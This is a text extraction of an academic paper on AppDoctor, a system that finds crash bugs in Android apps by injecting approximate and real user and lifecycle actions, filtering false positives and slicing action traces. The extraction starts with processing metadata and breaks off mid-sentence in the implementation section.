[[0, 34744, 0.68565]], "google_gemma-3-12b-it_contains_pii": [[0, 1594, false], [1594, 3484, null], [3484, 6059, null], [6059, 8588, null], [8588, 10401, null], [10401, 11663, null], [11663, 13935, null], [13935, 15113, null], [15113, 15999, null], [15999, 17260, null], [17260, 18620, null], [18620, 20204, null], [20204, 21078, null], [21078, 22449, null], [22449, 23681, null], [23681, 24821, null], [24821, 26150, null], [26150, 27398, null], [27398, 28812, null], [28812, 29999, null], [29999, 31188, null], [31188, 32202, null], [32202, 33499, null], [33499, 34405, null], [34405, 34744, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1594, true], [1594, 3484, null], [3484, 6059, null], [6059, 8588, null], [8588, 10401, null], [10401, 11663, null], [11663, 13935, null], [13935, 15113, null], [15113, 15999, null], [15999, 17260, null], [17260, 18620, null], [18620, 20204, null], [20204, 21078, null], [21078, 22449, null], [22449, 23681, null], [23681, 24821, null], [24821, 26150, null], [26150, 27398, null], [27398, 28812, null], [28812, 29999, null], [29999, 31188, null], [31188, 32202, null], [32202, 33499, null], [33499, 34405, null], [34405, 34744, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 34744, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 34744, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 34744, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 34744, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 34744, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 34744, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 34744, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 34744, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 34744, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 34744, null]], "pdf_page_numbers": [[0, 1594, 1], [1594, 3484, 2], [3484, 6059, 3], [6059, 8588, 4], [8588, 10401, 5], [10401, 11663, 6], [11663, 13935, 7], [13935, 15113, 8], [15113, 15999, 9], [15999, 17260, 10], [17260, 18620, 11], [18620, 20204, 12], [20204, 21078, 13], [21078, 22449, 14], [22449, 23681, 15], [23681, 24821, 16], [24821, 26150, 17], [26150, 27398, 18], [27398, 28812, 19], [28812, 29999, 20], [29999, 31188, 21], [31188, 32202, 22], [32202, 33499, 23], [33499, 34405, 24], [34405, 34744, 25]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 34744, 0.0038]]}
olmocr_science_pdfs
2024-12-10
2024-12-10
00c16145f724ad416415d628800f5a391e0369fc
Efficiently, Effectively Detecting Mobile App Bugs with AppDoctor Gang Hu Xinhao Yuan Yang Tang Junfeng Yang Columbia University {ganghu,xinhaoyuan,ty,junfeng}@cs.columbia.edu Abstract Mobile apps bring unprecedented levels of convenience, yet they are often buggy, and their bugs offset the convenience the apps bring. A key reason for buggy apps is that they must handle a vast variety of system and user actions such as being randomly killed by the OS to save resources, but app developers, facing tough competitions, lack time to thoroughly test these actions. AppDoctor is a system for efficiently and effectively testing apps against many system and user actions, and helping developers diagnose the resultant bug reports. It quickly screens for potential bugs using approximate execution, which runs much faster than real execution and exposes bugs but may cause false positives. From the reports, AppDoctor automatically verifies most bugs and prunes most false positives, greatly saving manual inspection effort. It uses action slicing to further speed up bug diagnosis. We implement AppDoctor in Android. It operates as a cloud of physical devices or emulators to scale up testing. Evaluation on 53 out of 100 most popular apps in Google Play and 11 of the most popular open-source apps shows that, AppDoctor effectively detects 72 bugs—including two bugs in the Android framework that affect all apps—with quick checking sessions, speeds up testing by 13.3 times, and vastly reduces diagnosis effort. 1. Introduction Mobile apps are a crucial part of the widely booming mobile ecosystems. These apps absorb many innovations and greatly improve our lives. They help users check emails, search the web, social-network, process documents, edit pictures, access (sometimes classified [16]) data, etc. Given the unprecedented levels of convenience and rich functionality of apps, it is unsurprising that Google Play [24], the app store of Android, alone has over 1 M apps with tens of billions of downloads [5]. Unfortunately, as evident by the large number of negative comments in Google Play, apps are frequently buggy, and the bugs offset the convenience the apps bring. A key reason for buggy apps is that they must correctly handle a vast variety of system and user actions. For instance, an app may be switched to background and killed by a mobile OS such as Android at any moment, regardless of what state the app is in. Yet, when the user reruns the app, it must still restore its state and proceed as if no interruption ever occurred. Unlike most traditional OS which support generic swapping of processes, a mobile OS can kill apps running in background to save battery and memory, while letting them backup and restore their own states. App developers must now correctly handle all possible system actions that may pause, stop, and kill their apps—the so-called lifecycle events in Android—at all possible moments, a very challenging problem. On top of these system actions, users can also trigger arbitrary UI actions available on the current UI screen. Unexpected user actions also cause various problems, such as security exploits that bypass screen locks [11, 50]. Testing these actions takes much time. Testing them over many device configurations (e.g., screen sizes), OS versions, and vendor customizations takes even more time. Yet, many apps are written by indie developers or small studios with limited time and resource budget. Facing tough competitions, developers often release apps under intense time-to-market pressure. Unsurprisingly, apps are often under-tested and react oddly to unexpected actions, seriously degrading user experience [31]. We present AppDoctor, a system for efficiently and effectively testing apps against many system and user actions, and helping developers diagnose the resultant bug reports. It gains efficiency using two ideas. First, it uses approximate execution to greatly speed up testing and reduce diagnosis effort. Specifically, it quickly screens for potential bugs by performing actions in approximate mode—which run much faster than actions in faithful mode and can expose bugs but allow false positives (FPs). For example, in- Mobile apps bring unprecedented levels of convenience, yet they are often buggy, and their bugs offset the convenience the apps bring. A key reason for buggy apps is that they must handle a vast variety of system and user actions such as being randomly killed by the OS to save resources, but app developers, facing tough competitions, lack time to thoroughly test these actions. AppDoctor is a system for efficiently and effectively testing apps against many system and user actions, and helping developers diagnose the resultant bug reports. It quickly screens for potential bugs using approximate execution, which runs much faster than real execution and exposes bugs but may cause false positives. From the reports, AppDoctor automatically verifies most bugs and prunes most false positives, greatly saving manual inspection effort. It uses action slicing to further speed up bug diagnosis. We implement AppDoctor in Android. It operates as a cloud of physical devices or emulators to scale up testing. Evaluation on 53 out of 100 most popular apps in Google Play and 11 of the most popular open-source apps shows that, AppDoctor effectively detects 72 bugs?including two bugs in the Android framework that affect all apps?with quick checking sessions, speeds up testing by 13.3 times and vastly reduces diagnosis effort. instead of waiting for more than two seconds to inject a long-click action on a GUI widget, AppDoctor simply invokes the widget’s long-click event handler. Invoking the handler is much faster but allows FPs because the handler may not be invoked at all even if a user long-clicks on the widget—the app’s GUI event dispatch logic may ignore the event or send the event to other widgets. Given a set of bug reports detected through approximate executions, AppDoctor reduces the FPs caused by approximation as follows. Based on the traces of actions in bug reports, AppDoctor automatically validates most bugs by generating testcases of low-level events such as key presses and screen touches (e.g., a real long click). These testcases can be used by developers to reproduce the bugs independently without AppDoctor. Moreover, AppDoctor automatically prunes most FPs with a new algorithm that selectively switches between approximate and faithful executions. By coupling these two modes of executions, AppDoctor solves a number of problems of prior approaches which either require much manual effort to inspect bug reports or are too slow. Approximate execution is essentially a “bloom filter” approach to bug detection: it leverages approximation for speed, and validates results with real executions. Like prior work [14, 15], it generates testcases to help developers independently reproduce bugs. Unlike prior work, it generates event testcases and aggressively embraces approximation. Second, AppDoctor uses action slicing to speed up reproducing and diagnosing app bugs. The trace leading to a bug often contains many actions. A long testcase makes it slow to reproduce a bug and isolate the cause. Fortunately, many actions in the trace are not relevant to the bug, and can be sliced out from the trace. However, doing so either requires precise action dependencies or is slow. To solve this problem, AppDoctor again embraces approximation, and employs a novel algorithm and action dependency definition to effectively slice out many unnecessary actions with high speed. We explicitly designed AppDoctor as a dynamic tool (i.e., it runs code) so that it can find many bugs while emitting few or no FPs. We did not design AppDoctor to catch all bugs (i.e., it has false negatives). An alternative is static analysis, but a static tool is likely to have difficulties understanding the asynchronous, implicit control flow due to GUI event dispatch. Moreover, a static tool cannot easily generate low-level event testcases for validating bugs. AppDoctor does not use symbolic execution because symbolic execution is typically neither scalable nor designed to catch bugs triggered by GUI event sequences. As a result, the bugs AppDoctor finds are often different from those found by static analysis or symbolic execution. We implement AppDoctor in Android, the most popular mobile platform today. It operates as a cloud of mobile devices or emulators to further scale up testing, and supports many device configurations and Android OS versions. To inject actions, it leverages Android’s instrumentation framework [3], avoiding modifications to the OS and simplifying deployment. Evaluation on 53 of the top 100 apps in Google Play and 11 of the most popular open-source apps shows that AppDoctor effectively detected 72 bugs in apps with tens of millions of users, built by reputable companies such as Google and Facebook; it even found two bugs in the Android framework that affect all apps; its approximate execution speeds up testing by 13.3 times; out of the 64 reports generated from one quick checking session, it verified 43 bugs and pruned 16 FPs automatically, and left only 5 reports for developer inspection; and its action slicing technique reduced the average length of traces by 4 times, further simplifying diagnosis. Next section gives some background. §3 describes two examples to illustrate AppDoctor’s advantages over prior approaches. §4 presents an overview of AppDoctor, §5 approximate execution, §6 action slicing, and §7 implementation. §8 shows the results. §9 discusses limitations, and §10 related work. §11 concludes. 2. Background In Android, an app organizes its logic into activities, each representing a single screen of UI. For instance, an email app may have an activity for user login, another for listing emails, another for reading an email, and yet another for composing an email. The number of activities varies greatly between apps, from a few to more than two hundred, depending on an app’s functionality. All activities run within the main thread of the apps. An activity contains widgets users interact with. Android provides a set of standard widgets [4], such as buttons, text boxes, seek bars (a slider for users to select a value from a range of values), switches (for users to select options), and number pickers (for users to select a value from a set of values by touching buttons or swiping a touch screen). Widgets handle a standard set of UI actions, such as clicks (press and release a widget), long-clicks (press, hold, and release a widget), typing text into text boxes, sliding seek bars, and toggling switches. Users interact with widgets by triggering low-level events, including touch events (users touching the device’s screen) and key events (users pressing or releasing keys). Android OS and apps work together to compose the low-level events into actions and dispatch the actions to the correct widgets. This dispatch can get quite complex because developers can customize widgets in many different ways. For instance, they can override the low-level event handlers to compose the events into non-standard actions or forward events to other widgets for handling. Moreover, they can create GUI layout with one widget covering another at runtime, so the widget on top receives the actions. Users also interact with an activity through three special keys of Android. The Back key typically causes Android to go back to the previous activity or undo a previous action. The Menu key typically pops up a menu widget listing actions that can be done within the current activity. The Search key typically starts a search in the current app. These keys present a standard, familiar interface for Android users. Besides user actions, an activity handles a set of systems actions called the lifecycle events [1]; Figure 1 shows these events and the names of their event handlers. Android uses these events to inform an activity about status changes including when (1) the activity is created (onCreate), (2) it becomes visible to the user but may be partially covered by another activity (onStart and onRestart), (3) it becomes the app running in foreground and receives user actions (onResume), (4) it is covered by another activity but may still be visible (onPause), (5) it is switched to the background (onStop), and (6) it is destroyed (onDestroy). Android dispatches lifecycle events to an activity for many purposes. For instance, an activity may want to read data from a file and fill the content to widgets when it is first created. More crucially, these events give an activity a chance to save its state before Android kills it. User actions, lifecycle events, and their interplay can be arbitrary and complex. According to our bug results, many popular apps and even the Android framework sometimes failed to handle them correctly. 3. Examples This section describes two examples to illustrate the advantages of AppDoctor over prior approaches. The first example is an Android GUI framework bug AppDoctor automatically found and verified and the second example is a FP AppDoctor automatically pruned. **Bug example.** This bug is in Android’s code for handling an app’s request of a service. For instance, when an app attempts to send a text message and asks the user to choose a text message app, the app calls Android’s createChooser method. Android then displays a dialog containing a list of apps. When there is no app for sending text messages, the dialog is empty. If at this moment, the user switches the app to the background, waits until Android saves the app’s state and stops the app, and then switches the app back to the foreground, the app would crash trying to dereference null. One approach to finding app bugs is to inject low-level events such as touch and key events using tools such as Monkey [47] and MonkeyRunner [40]. This approach typically has no FPs because the injected events are as real as what users may trigger. It is also simple, requiring little infrastructure to reproduce bugs, and the infrastructure is often already installed as part of Android. Thus, diagnosing bugs detected with this approach is easy. However, this approach is quite slow because some low-level events take a long time to inject. Specifically for this bug, this approach needs time at three places. First, to detect this bug, it must wait for a sufficiently long period of time for Android to save the app state and stop the app. In our experiments, this wait is at least 5 seconds. Second, this approach does not know when the app has finished processing an event, so it has to conservatively wait for some time after each event until the app is ready for the next event. This wait is at least 6s. Third, without knowing what actions it can perform, it typically blindly injects many redundant events (e.g., clicking at points within the same button which causes the same action), while missing critical ones (e.g., stopping the app while the dialog is displayed in this bug). AppDoctor solves all three problems. It approximates the effects of the app stop and start by directly calling the app’s lifecycle event handlers, running much faster and avoiding the long wait. It detects when an action is done, and immediately performs the next action. It also understands what actions are available to avoid doing much redundant work. It detected this bug when checking the popular app Craigslist and a number of other apps. (To avoid inflating our bug count, we counted all these reports as one bug in our evaluation in §8.1.) This bug was previously unknown to us. It was was recently fixed in the Android repository. AppDoctor not only found this bug fast, but also generated an event testcase that can reliably reproduce this problem on “clean” devices that do not have AppDoctor installed, providing the same level of diagnosis help to developers as Monkey. **FP example.** Another approach to test apps is to drive app executions by directly calling the app’s event handlers (e.g., by calling the handler of long-click without doing a real long-click) or mutating an app’s data (e.g., by setting the contents of a text box directly). A closed-source tool AppCrawler [7] appears to do so. However, this approach suffers from FPs because the actions it injects are approximate and may never occur in real executions. A significant possibility of FP means that developers must inspect the bug reports, requiring much manual effort. To illustrate why this approach has FPs, we describe an FP AppDoctor encountered and automatically pruned. This FP is in the MyCalendar app. It has a text box for users to input their birth month. It customizes this text box by allowing users to select the name of a month only using a number picker it displays, ensuring that the text box’s content can only be the name of one of the 12 months. When AppDoctor checked this app with approximate actions, it found an execution that led to an IndexOutOfBoundsException. Specifically, it found that this text box was marked as editable, so it set the text to “test,” a value users can never possibly set, causing the crash. Tools that directly call event handlers or set app data will suffer from this FP. Because of the significant possibility of FPs (25% in our experiments; see §8), users must inspect these tools’ reports, a labor-intensive, error-prone process. Fortunately, by coupling approximate and faithful executions, AppDoctor automatically prunes this FP. Specifically, for each bug report detected by performing actions in approximate mode, AppDoctor validates it by performing the actions again in faithful mode. For this example, AppDoctor attempted to set the text by issuing low-level touch and key events. It could not trigger the crash again because the app correctly validated the input, so it automatically classified the report as an FP. App input validation is just one of the reasons for FPs. Another is the complex event dispatch logic in Android and apps. A widget may claim that it is visible and its event handlers are invokable, but in real execution a user may never trigger the handlers. For instance, one GUI widget W1 may be covered by another W2, so the OS does not invoke W1’s handlers to process user clicks. However, AppDoctor cannot rule out W1 because visibility is only part of the story, and W2 may actually forward the events to W1. Precisely determining whether an event handler can be triggered by users may require manually deciphering the complex OS and app’s event dispatch logic. AppDoctor’s coupling of approximate and faithful executions solves all these problems with one stone. 4. Overview This section gives an overview of AppDoctor. Figure 2 shows its workflow. Given an app, AppDoctor explores possible executions of the app on a cloud of physical devices and emulator instances by repeatedly injecting actions. This exploration can use a variety of search algorithms and heuristics to select the actions to inject (§7.4). To quickly screen for potential bugs, AppDoctor performs actions in approximate mode during exploration (§5.2). For each potential bug detected, it emits a report containing the failure caused by the bug and the trace of actions leading to the failure. Once AppDoctor collects a set of bug reports, it runs automated diagnosis to classify reports into bugs and FPs by replaying each trace several times in approximate, faithful, and mixed mode (§5.3). It affords to replay several times because the number of bug reports is much smaller than the number of checking executions. It also applies action slicing to reduce trace lengths, further simplifying diagnosis (§6). It outputs (1) a set of auto-verified bugs accompanied with testcases that can reproduce the bugs on clean devices independent of AppDoctor, (2) a set of auto-pruned FPs so developers need not inspect them, and (3) a small number of reports marked as likely bugs or FPs with detailed traces for developer inspection. AppDoctor focuses at bugs that may cause crashes. It targets apps that use standard widgets and support standard actions. We leave it for future work to support custom checkers (e.g., a checker that verifies the consistency of app data), widgets, and actions. AppDoctor automatically generates typical inputs for the actions it supports (e.g., the text in a text box; see §7.6), but it may not find bugs which requires a specific input. These as well as other limitations may lead to false positives (see §9). 5. Approximate Execution This section presents AppDoctor’s approximate execution technique. We start by introducing the actions AppDoctor supports (§5.1), and then discuss the explore (§5.2) and the diagnosis stages (§5.3). 5.1 Actions AppDoctor supports 20 actions, split into three classes. The 7 actions in the first class run much faster in approximate mode than in faithful mode. The 5 actions in the second class run identically in approximate and faithful modes. The 8 actions in the last class have only approximate modes. We start with the first class. The first 4 actions in this class are GUI events on an app’s GUI widgets, and the other 3 are lifecycle events. For each action, we provide a general description, how AppDoctor performs it in approximate mode, how AppDoctor performs it in faithful mode, and the main reason for FPs. **LongClick.** A user presses a GUI widget for a time longer than 2 seconds. In approximate mode, AppDoctor calls the widget’s event handler by calling widget.performLongClick. In faithful mode, AppDoctor sends a touch event Down to the widget, waits for 3 seconds, and then sends a touch event Up. The main reason for FPs is that, depending on the event dispatch logic in Android OS and the app (§2), the touch events may not be sent to the widget, so the LongClick handler of the widget is not invoked in a real execution. A frequent scenario is that the widget is covered by another widget, so the widget on top intercepts all events. **SetEditText.** A user sets the text of a TextBox. In approximate mode, AppDoctor directly sets the text by calling the widget’s method `setText`. In faithful mode, AppDoctor sends a series of low-level events to the text box to set text. Specifically, it sends a touch event to set the focus to the text box, Backspace and Delete keys to erase the old text, and other keys to type the text. The main reason for FPs is that developers can customize a text box to allow only certain text to be set. For instance, they can validate the text or override the widget’s touch event handler to display a list of texts for a user to select. **SetNumberPicker.** A user sets the value of a number picker. In approximate mode, AppDoctor directly sets the value by calling the widget’s method `setValue`. In faithful mode, AppDoctor sends a series of touch events to press the buttons inside the number picker to gradually adjust its value. The main reason for FPs is similar to that of SetEditText where developers may allow only certain values to be set. **ListSelect.** A user scrolls a list widget and selects an item in the list. In approximate mode, AppDoctor calls the widget’s `setSelection` to make the item show up on the screen and select it. In faithful mode, AppDoctor sends a series of touch events to scroll the list until the given item shows up. The main reason for FPs is that developers can customize the list widget and limit the visible range of the list to a user. **PauseResume.** A user switches an app to the background (e.g., by running another app) for a short period of time, and then switches back the app (see lifecycle events in §2). Android OS pauses the app when the switch happens, and resumes it after the app is switched back. In approximate mode, AppDoctor calls the foreground activity’s event handlers `onPause` and `onResume` to emulate this action. In faithful mode, AppDoctor starts another app (currently Android’s Settings app for configuring system-wide parameters), waits for 1s, and switches back. The main reason for FPs is that developers can alter the event handlers called to handle lifecycle events. **StopStart.** This action is more involved than PauseResume. It occurs when a user switches an app to the background for a longer period of time, and then switches back. Since the time the app is in background is long, Android OS saves the app’s state and destroys the app to save memory. Android later restores the app’s state when the app is switched back. In approximate mode, AppDoctor calls the following event handlers of the current activity: `onPause`, `onSaveInstanceState`, `onStop`, `onRestart`, `onStart`, and `onResume`. In faithful mode, AppDoctor starts another app, waits for 10s, and switches back. The main reason for FPs is that developers can alter the event handlers called to handle lifecycle events. **Relaunch.** This action is even more involved than StopStart. It occurs when a user introduces some configuration changes that cause the current activity to be destroyed and recreated. For instance, a user may rotate her device (causing the activity to be destroyed) and rotate it back (causing the activity to be recreated). In approximate mode, AppDoctor calls Android OS’s `recreate` to destroy and recreate the activity. In faithful mode, AppDoctor injects low-level events to rotate the device’s orientation twice. The main reason for FPs is that apps may register their custom event handlers to handle relaunch-related events, so the activities are not really destroyed and recreated. All these 7 actions in the first class run much faster in approximate mode than in faithful mode, so AppDoctor runs them in approximate mode during exploration. AppDoctor supports a second class of 5 actions for which invoking their handlers is as fast as sending low-level events. Thus, AppDoctor injects low-level events for these actions in both approximate and faithful modes. **Click.** A user quickly taps a GUI widget. In both modes, AppDoctor sends a pair of touch events, Down and Up, to the center of a widget. **KeyPress.** A user presses a key on the phone, like the Back key or the Search key. AppDoctor sends a pair of key events Down and Up with the corresponding key code to the app. This action sends only special keys because standard text input is handled by `SetEditText`. **MoveSeekBar.** A user changes the value of a seek bar widget. In both modes, AppDoctor calculates the physical position on the widget that corresponds to the value the user is setting, and send a pair of touch event Down and Up on that position to the widget. **Rotate.** A user changes the orientation of the device. AppDoctor sends a series of low-level event to rotate the device’s orientation. AppDoctor supports a third class of 8 actions caused by external events in the execution environment of an app, such as the disconnection of the wireless network. AppDoctor injects them by sending emulated low-level events to an app, instead of for example disconnecting the network for real. We discuss three example actions below. **Intent.** An app may run an activity in response to a request from another app. These requests are called `intents` in Android. Currently AppDoctor injects all intents that an app declares to handle, such as viewing data, searching for media files, and getting data from a database. appdoctor.explore_once() { // returns a bug trace trace = "; appdoctor.reset_init_state(); while (app not exit and action limit not reached) { action_list = appdoctor.collect(); action = appdoctor.choose(action_list); appdoctor.perform(action, APPROX); trace.append(action); if (failure found) return trace; } } Figure 3: Algorithm to explore one execution for bugs. Network. AppDoctor injects network connectivity change events, such as the change from wireless to 3G and from connected to disconnection. Storage. AppDoctor injects storage related events such as the insertion or removal of an SD card. 5.2 Explore When AppDoctor explores app executions for bugs, it runs the actions described in the previous subsection in approximate mode for speed. Figure 3 shows AppDoctor’s algorithm to explore one execution of an app for bugs. It sets the initial state of the app, then repeatedly collects the actions that can be done, chooses one action, performs the action in approximate mode, and checks for bugs. If a failure such as an app crash occurs, it returns a trace of actions leading to the failure. To explore more executions, AppDoctor runs this algorithm repeatedly. It collects available actions by traversing the GUI hierarchy of the current activity leveraging the Android instrumentation framework (§7.1). AppDoctor then chooses one of the actions to inject. By configuring how to choose actions, AppDoctor can implement different search heuristics such as depth-first search, breadth-first search, priority search, and random walk (§7.4). AppDoctor performs the action as soon as the previous action is done, further improving speed (§7.5). 5.3 Diagnosis The bug reports detected by AppDoctor’s exploration are not always true bugs because the effects of actions in approximate mode are not always reproduced by the same actions in faithful mode. Manually inspecting all bug reports would be labor-intensive and error-prone, raising challenges for time and resource-constrained app developers. Fortunately, AppDoctor automatically classifies bug reports for the developers using the algorithm shown in Figure 4, which reduced the number of reports developers need to inspect by 13.6× in our evaluation (§8.4). This algorithm takes an action trace from a bug report, and classifies the report into four types: (1) verified bugs (real bugs reproducible on clean devices), (2) pruned false positives, (3) likely bugs, and (4) likely false positives. Type 1 and 2 need no further manual inspection to classify (for verified bugs, developers still have to pinpoint the code responsible for the bugs and patch it). The more reports AppDoctor places in these two types, the more effective AppDoctor is. Type 3 and 4 need some manual inspection, and AppDoctor’s detailed action trace and suggested types of the reports help reduce inspection effort. As shown in the algorithm, AppDoctor automatically diagnoses a bug report in three steps. First, it does a quick filtering to prune false positives caused by Android emulator/OS/environment problems. Specifically, it replays the trace in approximate mode, checking whether the same failure occurs. If the failure disappears, then the report is most likely caused by problems in the environment, such as bugs in the Android emulator (which we did encounter in our experiments) or temporary problems in remote servers. AppDoctor prunes these reports as FPs. Second, it automatically verifies bugs. Specifically, it simplifies the trace using the action slicing technique described in the next section, and replays the trace in faithful mode. If the same failure appears, then the trace almost always corresponds to a real bug. AppDoctor generates a MonkeyRunner testcase, and verifies the bug using clean devices independent of AppDoctor. If it can reproduce the failure, it classifies the report as a verified bug. The testcase can be sent directly to developers for reproducing and diagnosing the bug. If MonkeyRunner cannot reproduce the failure, then it is most likely caused by the difference in how AppDoctor and MonkeyRunner wait for an action to finish. Thus, AppDoctor classifies the report as a likely bug, so developers can inspect the trace and modify the timing of the events in the MonkeyRunner testcase to verify the bug. Third, AppDoctor automatically prunes FPs. At this point, the trace can be replayed in approximate mode, but not in faithful mode. If AppDoctor can pinpoint the action that causes this divergence, it can confirm that the report is an FP. Specifically, for each action in the trace (action1 in Figure 4), AppDoctor replays all other actions in the trace in approximate mode except this action. If the failure disappears, AppDoctor finds the culprit of the divergence, and classifies the report as a pruned FP. If AppDoctor cannot find such an action, it classifies the report as a likely FP for further inspection. ### 6. Action Slicing AppDoctor uses action slicing to remove unnecessary actions from a trace before determining whether the trace is a bug or FP (slice in Figure 4). This technique brings two benefits. First, by shortening the trace, it also shortens the final testcase (if the report is a bug), reducing developer diagnosis effort. Second, a shorter trace also speeds up replay. Slicing techniques [30, 54] have been shown to effectively shorten an instruction trace by removing instructions irrelevant to reaching a target instruction. However, these techniques all hinge on a clear specification of the dependencies between instructions, which AppDoctor does not have for the actions in its traces. Thus, it appears that AppDoctor can only use slow approaches such as attempting to remove actions one subset by one subset to shorten the trace. Our insight is that, because AppDoctor already provides an effective way to validate traces, it can embrace approximation in slicing as well. Specifically, given a trace, AppDoctor applies a fast slicing algorithm that computes a minimal slice assuming minimal, approximate dependencies between actions. It validates whether this slice can reproduce the failure. If so, it returns this slice immediately. Otherwise, it applies a slow algorithm to compute a more accurate slice. Figure 5 shows the fast slicing algorithm. It takes a trace and returns a slice of the trace containing actions necessary to reproduce the failure. It starts by putting the last action of the trace into slice because the last action is usually necessary to cause the failure. It then iterates through the trace in reverse order, adding any action that the actions in the slice approximately depend on. ```java appdoctor.fast_slice(trace) { slice = {last action of trace}; for (action in reverse(trace)) if (action in slice) slice.add(get_approx_depend(action, trace)); return slice; } get_approx_depend(action, trace) { for (action2 in trace) { if (action is enabled by action2) return action2; if (action is always available && action2.state == action.state) return action2; } } Figure 5: Fast slicing algorithm to remove actions from trace. ``` Figure 6: Type 1 action dependency. $S_1$ represents app states, and $a_i$ represents actions. Bold solid lines are the actions in the trace, thin solid lines the other actions available at a given state, and dotted lines the action dependency. $a_1$ depends on $a_2$ because $a_2$ enables $a_4$. Figure 7: Type 2 action dependency. $a_1$ depends on $a_2$ because $a_1$ is performed in $S_2$, and $a_2$ is the action that first leads to $S_2$. The key of this algorithm is get_approx_depend for computing approximate action dependencies. It leverages an approximate notion of an activity’s state. Specifically, this state includes each widget’s type, position, and content and the parent-child relationship between the widgets. It also includes the data the activity saves when it is switched to background. To obtain this data, AppDoctor calls the activity’s onPause, onSaveInstanceState and onResume handler. This state is approximate because the activity may hold additional data in other places such as files. Function get_approx_depend considers only two types of dependencies. First, if an action becomes available at some point, AppDoctor considers this action depending on the action that “enables” this action. For instance, suppose a Click action is performed on a button and the app displays a new activity. We say that the Click enables all actions of the new activity and is depended upon by these actions. Another example is shown in Figure 6. Action $a_4$ becomes available after action $a_2$ is performed, so AppDoctor considers $a_4$ dependent on $a_2$. Second, if an action is always available (e.g., a user can always press the Menu key regardless of which activity is in foreground) and is performed in some state $S_2$, then it depends on the action that first creates the state $S_2$ (Figure 7). For instance, suppose a user performs a sequence of actions ending with action $a_2$, causing the app to enter state $S_2$ for the first time. She then performs more actions, causing the app to return to state $S_2$, and performs action $a_3$ “press the Menu key.” get_approx_depend considers that action $a_3$ depends on action $a_2$. The intuition is that the effect of an always available action usually depends on the current app state, and this state depends on the action that leads the app to this state. When the slice computed by fast slicing cannot reproduce the failure, AppDoctor tries a slower slicing algorithm by removing cycles from the trace, where a cycle is a sequence of actions starts and ends at the same state. For instance, Figure 7 contains a cycle ($S_2 \rightarrow S_3 \rightarrow S_2$). If a sequence of actions do not change the app state, discarding them should not affect the reproducibility of the bug. If the slower algorithm also fails, it falls back to the slowest approach. It iterates through all actions in the trace, trying to remove them one subset by one subset. Our results show that fast slicing works very well. It worked for 43 out of 61 traces. The slower version worked for 10 more. Only 8 needed the slowest version. Moreover, it reduced the mean trace length from 38.71 to 10.03, making diagnosis much easier. 7. Implementation AppDoctor runs on a cluster of Android devices or emulators. Figure 8 shows the architecture. A controller monitors multiple agents and, when some agents become idle, commands these agents to start checking sessions based on developer configurations. The agents can run on the same machine as the controller or across a cluster of machines, enabling AppDoctor to scale. Each agent connects to a device or an emulator via the Android Debug Bridge [2]. The agent installs to the devices or emulators the target app to check and an instrumentation app for collecting and performing actions. It then starts and connects to the instrumentation app, which in turn starts the target app. The agent then explores possible executions of the target app by receiving the list of available actions from the instrumentation app and sending commands to the instrumentation app to perform actions on the target app. The agent runs in a separate process outside of the emulator or the device for robustness. It tolerates many types of failures including Android system failures and emulator crashes. Furthermore, it enables the system to keep information between checking executions, so AppDoctor can explore a different execution than previously explored (§7.4). The controller contains 188 lines of Python code. The agent contains 3701 lines of Python code. The instrumentation app contains 7259 lines of Java code. The remainder of this section discusses AppDoctor’s implementation details. 7.1 Instrumentation App To test an app, AppDoctor needs to monitor the app’s state, collect available actions from the app, and perform actions on the app. The Android instrumentation framework [3] provides interfaces for monitoring events delivered to an app and injecting events into the app. We built the instrumentation app using this framework. It runs in the same process as the target app for collecting and performing actions. It also leverages Java’s reflection mechanism to collect other information from the target app that the Android instrumentation framework cannot collect. Specifically, it uses reflection to get the list of widgets of an activity and directly invoke an app’s events handlers even if they are private or protected Java methods. The instrumentation app enables developers to write app-specific checkers, which we leave for future work. 7.2 App Repacking and Signing For security purposes, Android requires that the instrumentation app and the target app be signed by the same key. To work around this restriction, AppDoctor unpacks the target app and then repacks and signs the app using its own key. Furthermore, since AppDoctor needs to communicate with the instrumentation app through socket connections, it uses ApkTool [12] to add network permission to the target app. 7.3 Optimizations We implemented two optimizations in AppDoctor to further speedup the testing process. First, AppDoctor pre-generates a repository of cleanly booted emulator snapshots, one per configuration (e.g., screen size and density). When checking an app, AppDoctor simply starts from the specific snap- shot instead of booting an emulator from scratch, which can take 5 minutes. Second, to check multiple executions of an app, AppDoctor reuses the same emulator instance without starting a new one. To reset the app’s initial state (§5.2), it simply kills the app process and wipes its data. These two optimizations minimize the preparation overhead and ensure that AppDoctor spends most of the time checking apps. 7.4 Exploration Methods Recall that when AppDoctor explores possible executions of an app, it can choose the next action to explore using different methods (Figure 3). It currently supports four methods: interactive, scripted, random, and systematic. With the interactive method, AppDoctor shows the list of available actions to the developer and lets her decide which one to perform, so she has total control of the exploration process. This method is most suitable for diagnosing bugs. With the scripted method, developers write scripts to select actions, and AppDoctor runs these test scripts. This method is most suitable for regression and functional testing. With the random method, AppDoctor randomly selects an action to perform. This method is most suitable for automatic testing. With the systematic method, AppDoctor systematically enumerates through the actions for bugs using several search heuristics, including breadth-first search, depth-first search, and developers written heuristics. This method is most suitable for model checking [21, 26, 32, 41, 44, 51, 52]. 7.5 Waiting for Actions to Finish Recall that AppDoctor performs actions on the target app as soon as the previous action is done. It detects when the app is done with the action using the Android instrumentation framework’s waitForIdle function, which returns when the main thread—the thread for processing all GUI events—is idle. Two apps, Twitter and ESPN, sometimes keep the main thread busy (e.g., during the login activity of Twitter), so AppDoctor falls back to waiting for a certain length of time (3 seconds). Apps may also run asynchronous tasks in background using Android’s AsyncTask Java class, so even if their main threads are idle, the overall event processing may still be running. AppDoctor solves this problem by intercepting asynchronous tasks and waiting for them to finish. Specifically, AppDoctor uses 